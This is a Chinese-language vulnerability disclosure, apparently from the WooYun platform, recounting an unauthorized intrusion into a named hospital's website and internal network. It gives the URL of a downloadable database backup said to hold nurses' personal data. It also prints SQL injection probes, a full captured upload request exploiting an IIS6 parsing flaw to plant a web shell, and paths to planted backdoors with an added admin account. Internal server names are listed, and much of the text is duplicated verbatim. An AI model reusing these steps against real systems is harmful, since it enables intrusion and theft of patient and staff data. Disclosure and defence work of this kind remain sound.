漏洞详情

披露状态:

2014-04-01: 细节已通知厂商并且等待厂商处理中
2014-04-05: 厂商已经确认,细节仅向厂商公开
2014-04-15: 细节向核心白帽子及相关领域专家公开
2014-04-25: 细节向普通白帽子公开
2014-05-05: 细节向实习白帽子公开
2014-05-16: 细节向公众公开

简要描述:

某大型医院web入侵到内网渗透

详细说明:

首先是数据库备份文件可被下载



链接:



http://xjwww.fmmu.edu.cn/D.rar





1.png





我看了下,虽然是很早的数据,但是还是有些信息,各种小护士联系电话,身份证号,住址,姓名.而且对下一步的渗透也埋下了伏笔



第二处就是主站存在明显注入:



漏洞链接:



http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1





加单引号爆错,并且爆出了绝对路径



Microsoft JET Database Engine 错误 '80040e14' 

语法错误 (操作符丢失) 在查询表达式 'uid=1' and sh='1' ORDER BY time DESC' 中。

D:\西京医院主站20130718\BZXXQ\../inc/cls_main.asp,行 303





进一步确定存在注入



http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=1



http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=2



返回结果不同,存在sql注射,刚才我们也得到了数据库结构,所以呢,数据库的所有东西已经一目了然了



第三处问题存在上传漏洞,这个更是致命的,直接getshell



问题链接:



http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp





上传用burp抓包,分析post包,可以看到,对filepath是可控的,由于站点web容器为iis6,所以结合iis6解析漏洞,可以直接getshell



POST /Talents/base/fj_upfile.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
DNT: 1
Referer: http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3992b201b6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 5402
Host: xjwww.fmmu.edu.cn
Pragma: no-cache
Cookie: _pk_id.46.8753=003ff2d41d9fcfc8.1396338965.1.1396341021.1396338965.; _pk_ses.46.8753=*; CNZZDATA2369866=cnzz_eid%3D472799282-1396338970-%26ntime%3D1396338970%26cnzz_a%3D5%26ltime%3D1396338964750; ASPSESSIONIDSSBBRBDQ=FPFHAHDBMBBCPEOHELFHGLMH

-----------------------------7de3992b201b6
Content-Disposition: form-data; name="filepath"

/UploadFile/
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="act"

upload
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="file1"; filename="a.jpg"
Content-Type: image/gif





修改post包,上传shell



2.png





查看源码得到shell地址



3.png





上菜刀



caidao.png





简单提权,得到服务器权限



服务器名称            注释

-------------------------------------------------------------------------------
\\BLBSJYS-WEB2072
\\CLOUD-SQL2008R2 VMware vSphere Database
\\CLOUD-VCENTER VMware vSphere vCenter
\\CSK-WEB207197
\\FMHZL-WEB fmhzl-web
\\FSK-WEB207198
\\GK-WEB207203
\\GXGL-WEB 肝血管瘤
\\HXK-WEB207204
\\HYX-WEB207199
\\JYK-WEB207205
\\JYKSYJPKC-WEB20
\\LLK-WEB207201
\\LNBK-WEB207200
\\MNWK-WEB207207
\\MZK-WEB207206
\\NFMK-WEB207196
\\PFYY-WEB207215
\\RBH-WEB207222
\\RK-WEB207195
\\SHARE-SERVER
\\SXK-WEB207201
\\SZNK-WEB207197
\\XGNFMWK-WEB2072
\\XHWK-WEB207200
\\XJFCK-WEB
\\XJHYX-WEB
\\XJMZK-WEB
\\XJSSK-WEB
\\XJYY-WEB207193
\\XJYYB-WEB207194
\\XJZLK-WEB207196
\\XJZYZ-WEB207195
\\XSK-WEB207208
\\XXGWK-WEB207202
\\YJK-CHINESE-WEB
\\YJK-ENGLISH-WEB
\\YJK-WEB207198
\\YK-WEB207210
\\ZLFSZX-WEB20721
\\ZXWK-WEB207212
\\ZYK-WEB
\\绿盟服务器25510





内网机器可能不止这些,不过如果要是继续下去,各种病人,医院工作人员的个人信息很可能会泄漏,希望能引起重视,另外发现别人的后门



http://xjwww.fmmu.edu.cn/x.asp



本次测试上传后门:



http://xjwww.fmmu.edu.cn/UploadFile/1.asp;20144117046.gif



http://xjwww.fmmu.edu.cn/asp/help.asp



添加管理帐号 test test



原谅我未授权就检测!!!























漏洞证明:

http://xjwww.fmmu.edu.cn/D.rar





1.png







明显注入:





http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1





加单引号爆错,并且爆出了绝对路径



Microsoft JET Database Engine 错误 '80040e14' 

语法错误 (操作符丢失) 在查询表达式 'uid=1' and sh='1' ORDER BY time DESC' 中。

D:\西京医院主站20130718\BZXXQ\../inc/cls_main.asp,行 303





进一步确定存在注入



http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=1



http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=2



返回结果不同,存在sql注射,刚才我们也得到了数据库结构,所以呢,数据库的所有东西已经一目了然了



第三处问题存在上传漏洞,这个更是致命的,直接getshell



问题链接:



http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp





上传用burp抓包,分析post包,可以看到,对filepath是可控的,由于站点web容器为iis6,所以结合iis6解析漏洞,可以直接getshell



POST /Talents/base/fj_upfile.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
DNT: 1
Referer: http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3992b201b6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 5402
Host: xjwww.fmmu.edu.cn
Pragma: no-cache
Cookie: _pk_id.46.8753=003ff2d41d9fcfc8.1396338965.1.1396341021.1396338965.; _pk_ses.46.8753=*; CNZZDATA2369866=cnzz_eid%3D472799282-1396338970-%26ntime%3D1396338970%26cnzz_a%3D5%26ltime%3D1396338964750; ASPSESSIONIDSSBBRBDQ=FPFHAHDBMBBCPEOHELFHGLMH

-----------------------------7de3992b201b6
Content-Disposition: form-data; name="filepath"

/UploadFile/
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="act"

upload
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="file1"; filename="a.jpg"
Content-Type: image/gif





修改post包,上传shell



2.png





查看源码得到shell地址



3.png





上菜刀



caidao.png





简单提权,得到服务器权限



服务器名称            注释

-------------------------------------------------------------------------------
\\BLBSJYS-WEB2072
\\CLOUD-SQL2008R2 VMware vSphere Database
\\CLOUD-VCENTER VMware vSphere vCenter
\\CSK-WEB207197
\\FMHZL-WEB fmhzl-web
\\FSK-WEB207198
\\GK-WEB207203
\\GXGL-WEB 肝血管瘤
\\HXK-WEB207204
\\HYX-WEB207199
\\JYK-WEB207205
\\JYKSYJPKC-WEB20
\\LLK-WEB207201
\\LNBK-WEB207200
\\MNWK-WEB207207
\\MZK-WEB207206
\\NFMK-WEB207196
\\PFYY-WEB207215
\\RBH-WEB207222
\\RK-WEB207195
\\SHARE-SERVER
\\SXK-WEB207201
\\SZNK-WEB207197
\\XGNFMWK-WEB2072
\\XHWK-WEB207200
\\XJFCK-WEB
\\XJHYX-WEB
\\XJMZK-WEB
\\XJSSK-WEB
\\XJYY-WEB207193
\\XJYYB-WEB207194
\\XJZLK-WEB207196
\\XJZYZ-WEB207195
\\XSK-WEB207208
\\XXGWK-WEB207202
\\YJK-CHINESE-WEB
\\YJK-ENGLISH-WEB
\\YJK-WEB207198
\\YK-WEB207210
\\ZLFSZX-WEB20721
\\ZXWK-WEB207212
\\ZYK-WEB
\\绿盟服务器25510





修复方案:

各种修复把!安全实在不敢恭维。。

版权声明:转载请注明来源 卡卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-04-05 21:33

厂商回复:

最新状态:

暂无


漏洞评价: